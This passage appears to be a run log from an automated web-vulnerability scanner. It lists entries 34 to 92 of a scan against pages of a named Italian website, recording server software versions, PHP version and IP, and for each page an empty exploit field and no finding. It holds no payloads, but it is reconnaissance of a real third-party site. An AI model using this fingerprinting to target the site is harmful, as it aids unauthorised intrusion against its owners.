  1985. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1986. |_[ + ] More details:: / - / , ISP:
  1987. |_[ + ] Found:: UNIDENTIFIED
  1988.  
  1989. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1990. |_[ + ] [ 34 / 100 ]-[11:31:09] [ - ]
  1991. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/marconi ]
  1992. |_[ + ] Exploit::
  1993. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1994. |_[ + ] More details:: / - / , ISP:
  1995. |_[ + ] Found:: UNIDENTIFIED
  1996.  
  1997. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1998. |_[ + ] [ 35 / 100 ]-[11:31:12] [ - ]
  1999. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/regolamento ]
  2000. |_[ + ] Exploit::
  2001. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2002. |_[ + ] More details:: / - / , ISP:
  2003. |_[ + ] Found:: UNIDENTIFIED
  2004.  
  2005. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2006. |_[ + ] [ 36 / 100 ]-[11:31:17] [ - ]
  2007. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/obbedienza ]
  2008. |_[ + ] Exploit::
  2009. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2010. |_[ + ] More details:: / - / , ISP:
  2011. |_[ + ] Found:: UNIDENTIFIED
  2012.  
  2013. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2014. |_[ + ] [ 37 / 100 ]-[11:31:20] [ - ]
  2015. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/allocuzione ]
  2016. |_[ + ] Exploit::
  2017. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2018. |_[ + ] More details:: / - / , ISP:
  2019. |_[ + ] Found:: UNIDENTIFIED
  2020.  
  2021. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2022. |_[ + ] [ 38 / 100 ]-[11:31:25] [ - ]
  2023. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/simboli ]
  2024. |_[ + ] Exploit::
  2025. |_[ + ] Information Server:: , , IP::0
  2026. |_[ + ] More details::
  2027. |_[ + ] Found:: UNIDENTIFIED
  2028.  
  2029. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2030. |_[ + ] [ 39 / 100 ]-[11:31:30] [ - ]
  2031. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/ponte ]
  2032. |_[ + ] Exploit::
  2033. |_[ + ] Information Server:: , , IP:77.238.18.215:80
  2034. |_[ + ] More details:: / - / , ISP:
  2035. |_[ + ] Found:: UNIDENTIFIED
  2036.  
  2037. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2038. |_[ + ] [ 40 / 100 ]-[11:31:32] [ - ]
  2039. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/climaf ]
  2040. |_[ + ] Exploit::
  2041. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2042. |_[ + ] More details:: / - / , ISP:
  2043. |_[ + ] Found:: UNIDENTIFIED
  2044.  
  2045. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2046. |_[ + ] [ 41 / 100 ]-[11:31:38] [ - ]
  2047. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/mitologia ]
  2048. |_[ + ] Exploit::
  2049. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2050. |_[ + ] More details:: / - / , ISP:
  2051. |_[ + ] Found:: UNIDENTIFIED
  2052.  
  2053. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2054. |_[ + ] [ 42 / 100 ]-[11:31:43] [ - ]
  2055. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/concorso ]
  2056. |_[ + ] Exploit::
  2057. |_[ + ] Information Server:: , , IP::0
  2058. |_[ + ] More details::
  2059. |_[ + ] Found:: UNIDENTIFIED
  2060.  
  2061. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2062. |_[ + ] [ 43 / 100 ]-[11:31:46] [ - ]
  2063. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/mondo ]
  2064. |_[ + ] Exploit::
  2065. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2066. |_[ + ] More details:: / - / , ISP:
  2067. |_[ + ] Found:: UNIDENTIFIED
  2068.  
  2069. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2070. |_[ + ] [ 44 / 100 ]-[11:31:49] [ - ]
  2071. |_[ + ] Target:: [ http://www.granloggiafemminile.it/glossario/ara ]
  2072. |_[ + ] Exploit::
  2073. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2074. |_[ + ] More details:: / - / , ISP:
  2075. |_[ + ] Found:: UNIDENTIFIED
  2076.  
  2077. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2078. |_[ + ] [ 45 / 100 ]-[11:31:52] [ - ]
  2079. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/tarocchi ]
  2080. |_[ + ] Exploit::
  2081. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2082. |_[ + ] More details:: / - / , ISP:
  2083. |_[ + ] Found:: UNIDENTIFIED
  2084.  
  2085. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2086. |_[ + ] [ 46 / 100 ]-[11:31:56] [ - ]
  2087. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/creazione ]
  2088. |_[ + ] Exploit::
  2089. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2090. |_[ + ] More details:: / - / , ISP:
  2091. |_[ + ] Found:: UNIDENTIFIED
  2092.  
  2093. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2094. |_[ + ] [ 47 / 100 ]-[11:31:58] [ - ]
  2095. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/fratelli ]
  2096. |_[ + ] Exploit::
  2097. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2098. |_[ + ] More details:: / - / , ISP:
  2099. |_[ + ] Found:: UNIDENTIFIED
  2100.  
  2101. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2102. |_[ + ] [ 48 / 100 ]-[11:32:03] [ - ]
  2103. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/colonne ]
  2104. |_[ + ] Exploit::
  2105. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2106. |_[ + ] More details:: / - / , ISP:
  2107. |_[ + ] Found:: UNIDENTIFIED
  2108.  
  2109. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2110. |_[ + ] [ 49 / 100 ]-[11:32:07] [ - ]
  2111. |_[ + ] Target:: [ http://www.granloggiafemminile.it/uncategorized/benda ]
  2112. |_[ + ] Exploit::
  2113. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2114. |_[ + ] More details:: / - / , ISP:
  2115. |_[ + ] Found:: UNIDENTIFIED
  2116.  
  2117. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2118. |_[ + ] [ 50 / 100 ]-[11:32:12] [ - ]
  2119. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/intuizione ]
  2120. |_[ + ] Exploit::
  2121. |_[ + ] Information Server:: , , IP:77.238.18.215:80
  2122. |_[ + ] More details:: / - / , ISP:
  2123. |_[ + ] Found:: UNIDENTIFIED
  2124.  
  2125. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2126. |_[ + ] [ 51 / 100 ]-[11:32:14] [ - ]
  2127. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/errore ]
  2128. |_[ + ] Exploit::
  2129. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2130. |_[ + ] More details:: / - / , ISP:
  2131. |_[ + ] Found:: UNIDENTIFIED
  2132.  
  2133. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2134. |_[ + ] [ 52 / 100 ]-[11:32:18] [ - ]
  2135. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/pensiero ]
  2136. |_[ + ] Exploit::
  2137. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2138. |_[ + ] More details:: / - / , ISP:
  2139. |_[ + ] Found:: UNIDENTIFIED
  2140.  
  2141. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2142. |_[ + ] [ 53 / 100 ]-[11:32:20] [ - ]
  2143. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/condivisione ]
  2144. |_[ + ] Exploit::
  2145. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2146. |_[ + ] More details:: / - / , ISP:
  2147. |_[ + ] Found:: UNIDENTIFIED
  2148.  
  2149. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2150. |_[ + ] [ 54 / 100 ]-[11:32:25] [ - ]
  2151. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/tolleranza ]
  2152. |_[ + ] Exploit::
  2153. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2154. |_[ + ] More details:: / - / , ISP:
  2155. |_[ + ] Found:: UNIDENTIFIED
  2156.  
  2157. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2158. |_[ + ] [ 55 / 100 ]-[11:32:30] [ - ]
  2159. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/quadrilungo ]
  2160. |_[ + ] Exploit::
  2161. |_[ + ] Information Server:: , , IP::0
  2162. |_[ + ] More details::
  2163. |_[ + ] Found:: UNIDENTIFIED
  2164.  
  2165. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2166. |_[ + ] [ 56 / 100 ]-[11:32:33] [ - ]
  2167. |_[ + ] Target:: [ http://www.granloggiafemminile.it/uncategorized/batteria ]
  2168. |_[ + ] Exploit::
  2169. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2170. |_[ + ] More details:: / - / , ISP:
  2171. |_[ + ] Found:: UNIDENTIFIED
  2172.  
  2173. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2174. |_[ + ] [ 57 / 100 ]-[11:32:39] [ - ]
  2175. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/ritualita ]
  2176. |_[ + ] Exploit::
  2177. |_[ + ] Information Server:: , , IP:77.238.18.215:80
  2178. |_[ + ] More details:: / - / , ISP:
  2179. |_[ + ] Found:: UNIDENTIFIED
  2180.  
  2181. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2182. |_[ + ] [ 58 / 100 ]-[11:32:42] [ - ]
  2183. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/ancona ]
  2184. |_[ + ] Exploit::
  2185. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2186. |_[ + ] More details:: / - / , ISP:
  2187. |_[ + ] Found:: UNIDENTIFIED
  2188.  
  2189. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2190. |_[ + ] [ 59 / 100 ]-[11:32:45] [ - ]
  2191. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/orientamento ]
  2192. |_[ + ] Exploit::
  2193. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2194. |_[ + ] More details:: / - / , ISP:
  2195. |_[ + ] Found:: UNIDENTIFIED
  2196.  
  2197. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2198. |_[ + ] [ 60 / 100 ]-[11:32:48] [ - ]
  2199. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/bologna ]
  2200. |_[ + ] Exploit::
  2201. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2202. |_[ + ] More details:: / - / , ISP:
  2203. |_[ + ] Found:: UNIDENTIFIED
  2204.  
  2205. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2206. |_[ + ] [ 61 / 100 ]-[11:32:51] [ - ]
  2207. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/glmfi ]
  2208. |_[ + ] Exploit::
  2209. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2210. |_[ + ] More details:: / - / , ISP:
  2211. |_[ + ] Found:: UNIDENTIFIED
  2212.  
  2213. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2214. |_[ + ] [ 62 / 100 ]-[11:32:56] [ - ]
  2215. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/genere ]
  2216. |_[ + ] Exploit::
  2217. |_[ + ] Information Server:: , , IP::0
  2218. |_[ + ] More details::
  2219. |_[ + ] Found:: UNIDENTIFIED
  2220.  
  2221. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2222. |_[ + ] [ 63 / 100 ]-[11:33:00] [ - ]
  2223. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/urlo ]
  2224. |_[ + ] Exploit::
  2225. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2226. |_[ + ] More details:: / - / , ISP:
  2227. |_[ + ] Found:: UNIDENTIFIED
  2228.  
  2229. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2230. |_[ + ] [ 64 / 100 ]-[11:33:05] [ - ]
  2231. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/toledo ]
  2232. |_[ + ] Exploit::
  2233. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2234. |_[ + ] More details:: / - / , ISP:
  2235. |_[ + ] Found:: UNIDENTIFIED
  2236.  
  2237. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2238. |_[ + ] [ 65 / 100 ]-[11:33:08] [ - ]
  2239. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/berlino ]
  2240. |_[ + ] Exploit::
  2241. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2242. |_[ + ] More details:: / - / , ISP:
  2243. |_[ + ] Found:: UNIDENTIFIED
  2244.  
  2245. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2246. |_[ + ] [ 66 / 100 ]-[11:33:13] [ - ]
  2247. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/sorellanza ]
  2248. |_[ + ] Exploit::
  2249. |_[ + ] Information Server:: , , IP:77.238.18.215:80
  2250. |_[ + ] More details:: / - / , ISP:
  2251. |_[ + ] Found:: UNIDENTIFIED
  2252.  
  2253. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2254. |_[ + ] [ 67 / 100 ]-[11:33:17] [ - ]
  2255. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/goi ]
  2256. |_[ + ] Exploit::
  2257. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2258. |_[ + ] More details:: / - / , ISP:
  2259. |_[ + ] Found:: UNIDENTIFIED
  2260.  
  2261. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2262. |_[ + ] [ 68 / 100 ]-[11:33:19] [ - ]
  2263. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/bianca ]
  2264. |_[ + ] Exploit::
  2265. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2266. |_[ + ] More details:: / - / , ISP:
  2267. |_[ + ] Found:: UNIDENTIFIED
  2268.  
  2269. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2270. |_[ + ] [ 69 / 100 ]-[11:33:23] [ - ]
  2271. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/rispetto ]
  2272. |_[ + ] Exploit::
  2273. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2274. |_[ + ] More details:: / - / , ISP:
  2275. |_[ + ] Found:: UNIDENTIFIED
  2276.  
  2277. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2278. |_[ + ] [ 70 / 100 ]-[11:33:27] [ - ]
  2279. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/femminicidio ]
  2280. |_[ + ] Exploit::
  2281. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2282. |_[ + ] More details:: / - / , ISP:
  2283. |_[ + ] Found:: UNIDENTIFIED
  2284.  
  2285. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2286. |_[ + ] [ 71 / 100 ]-[11:33:31] [ - ]
  2287. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/inedito ]
  2288. |_[ + ] Exploit::
  2289. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2290. |_[ + ] More details:: / - / , ISP:
  2291. |_[ + ] Found:: UNIDENTIFIED
  2292.  
  2293. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2294. |_[ + ] [ 72 / 100 ]-[11:33:35] [ - ]
  2295. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/significato ]
  2296. |_[ + ] Exploit::
  2297. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2298. |_[ + ] More details:: / - / , ISP:
  2299. |_[ + ] Found:: UNIDENTIFIED
  2300.  
  2301. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2302. |_[ + ] [ 73 / 100 ]-[11:33:40] [ - ]
  2303. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/armonia ]
  2304. |_[ + ] Exploit::
  2305. |_[ + ] Information Server:: , , IP::0
  2306. |_[ + ] More details::
  2307. |_[ + ] Found:: UNIDENTIFIED
  2308.  
  2309. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2310. |_[ + ] [ 74 / 100 ]-[11:33:43] [ - ]
  2311. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/libro ]
  2312. |_[ + ] Exploit::
  2313. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2314. |_[ + ] More details:: / - / , ISP:
  2315. |_[ + ] Found:: UNIDENTIFIED
  2316.  
  2317. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2318. |_[ + ] [ 75 / 100 ]-[11:33:49] [ - ]
  2319. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/beltrami ]
  2320. |_[ + ] Exploit::
  2321. |_[ + ] Information Server:: , , IP:77.238.18.215:80
  2322. |_[ + ] More details:: / - / , ISP:
  2323. |_[ + ] Found:: UNIDENTIFIED
  2324.  
  2325. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2326. |_[ + ] [ 76 / 100 ]-[11:33:52] [ - ]
  2327. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/distacco ]
  2328. |_[ + ] Exploit::
  2329. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2330. |_[ + ] More details:: / - / , ISP:
  2331. |_[ + ] Found:: UNIDENTIFIED
  2332.  
  2333. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2334. |_[ + ] [ 77 / 100 ]-[11:33:56] [ - ]
  2335. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/agape ]
  2336. |_[ + ] Exploit::
  2337. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2338. |_[ + ] More details:: / - / , ISP:
  2339. |_[ + ] Found:: UNIDENTIFIED
  2340.  
  2341. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2342. |_[ + ] [ 78 / 100 ]-[11:34:01] [ - ]
  2343. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/oristano ]
  2344. |_[ + ] Exploit::
  2345. |_[ + ] Information Server:: , , IP::0
  2346. |_[ + ] More details::
  2347. |_[ + ] Found:: UNIDENTIFIED
  2348.  
  2349. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2350. |_[ + ] [ 79 / 100 ]-[11:34:06] [ - ]
  2351. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/ariuan ]
  2352. |_[ + ] Exploit::
  2353. |_[ + ] Information Server:: , , IP::0
  2354. |_[ + ] More details::
  2355. |_[ + ] Found:: UNIDENTIFIED
  2356.  
  2357. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2358. |_[ + ] [ 80 / 100 ]-[11:34:08] [ - ]
  2359. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/eleonora ]
  2360. |_[ + ] Exploit::
  2361. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2362. |_[ + ] More details:: / - / , ISP:
  2363. |_[ + ] Found:: UNIDENTIFIED
  2364.  
  2365. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2366. |_[ + ] [ 81 / 100 ]-[11:34:10] [ - ]
  2367. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/brindisi ]
  2368. |_[ + ] Exploit::
  2369. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2370. |_[ + ] More details:: / - / , ISP:
  2371. |_[ + ] Found:: UNIDENTIFIED
  2372.  
  2373. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2374. |_[ + ] [ 82 / 100 ]-[11:34:13] [ - ]
  2375. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/violenza ]
  2376. |_[ + ] Exploit::
  2377. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2378. |_[ + ] More details:: / - / , ISP:
  2379. |_[ + ] Found:: UNIDENTIFIED
  2380.  
  2381. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2382. |_[ + ] [ 83 / 100 ]-[11:34:18] [ - ]
  2383. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/milano ]
  2384. |_[ + ] Exploit::
  2385. |_[ + ] Information Server:: , , IP::0
  2386. |_[ + ] More details::
  2387. |_[ + ] Found:: UNIDENTIFIED
  2388.  
  2389. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2390. |_[ + ] [ 84 / 100 ]-[11:34:20] [ - ]
  2391. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/gemellaggio ]
  2392. |_[ + ] Exploit::
  2393. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2394. |_[ + ] More details:: / - / , ISP:
  2395. |_[ + ] Found:: UNIDENTIFIED
  2396.  
  2397. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2398. |_[ + ] [ 85 / 100 ]-[11:34:23] [ - ]
  2399. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/aldebaran ]
  2400. |_[ + ] Exploit::
  2401. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2402. |_[ + ] More details:: / - / , ISP:
  2403. |_[ + ] Found:: UNIDENTIFIED
  2404.  
  2405. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2406. |_[ + ] [ 86 / 100 ]-[11:34:28] [ - ]
  2407. |_[ + ] Target:: [ http://www.granloggiafemminile.it/altre-obbedienze ]
  2408. |_[ + ] Exploit::
  2409. |_[ + ] Information Server:: , , IP::0
  2410. |_[ + ] More details::
  2411. |_[ + ] Found:: UNIDENTIFIED
  2412.  
  2413. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2414. |_[ + ] [ 87 / 100 ]-[11:34:31] [ - ]
  2415. |_[ + ] Target:: [ http://www.granloggiafemminile.it/?wordfence_logHuman=1&hid=365B9166CBA51CCB2A3C9D6F5F9FF957 ]
  2416. |_[ + ] Exploit::
  2417. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2418. |_[ + ] More details:: / - / , ISP:
  2419. |_[ + ] Found:: UNIDENTIFIED
  2420.  
  2421. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2422. |_[ + ] [ 88 / 100 ]-[11:34:33] [ - ]
  2423. |_[ + ] Target:: [ http://www.granloggiafemminile.it/portfolio-skills/photoshop ]
  2424. |_[ + ] Exploit::
  2425. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2426. |_[ + ] More details:: / - / , ISP:
  2427. |_[ + ] Found:: UNIDENTIFIED
  2428.  
  2429. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2430. |_[ + ] [ 89 / 100 ]-[11:34:36] [ - ]
  2431. |_[ + ] Target:: [ http://www.granloggiafemminile.it/portfolio-skills/illustrator ]
  2432. |_[ + ] Exploit::
  2433. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2434. |_[ + ] More details:: / - / , ISP:
  2435. |_[ + ] Found:: UNIDENTIFIED
  2436.  
  2437. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2438. |_[ + ] [ 90 / 100 ]-[11:34:38] [ - ]
  2439. |_[ + ] Target:: [ http://www.granloggiafemminile.it/attivita-estere/climaf ]
  2440. |_[ + ] Exploit::
  2441. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2442. |_[ + ] More details:: / - / , ISP:
  2443. |_[ + ] Found:: UNIDENTIFIED
  2444.  
  2445. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2446. |_[ + ] [ 91 / 100 ]-[11:34:41] [ - ]
  2447. |_[ + ] Target:: [ http://www.granloggiafemminile.it/portfolio-tags/politics ]
  2448. |_[ + ] Exploit::
  2449. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2450. |_[ + ] More details:: / - / , ISP:
  2451. |_[ + ] Found:: UNIDENTIFIED
  2452.  
  2453. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2454. |_[ + ] [ 92 / 100 ]-[11:34:44] [ - ]
  2455. |_[ + ] Target:: [ http://www.granloggiafemminile.it/attivita-estere/umm ]
  2456. |_[ + ] Exploit::
  2457. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2458. |_[ + ] More details:: / - / , ISP:
  2459. |_[ + ] Found:: UNIDENTIFIED
  2460.  
  2461. _[ - ]::--------------------------------------------------------------------------------------------------------------
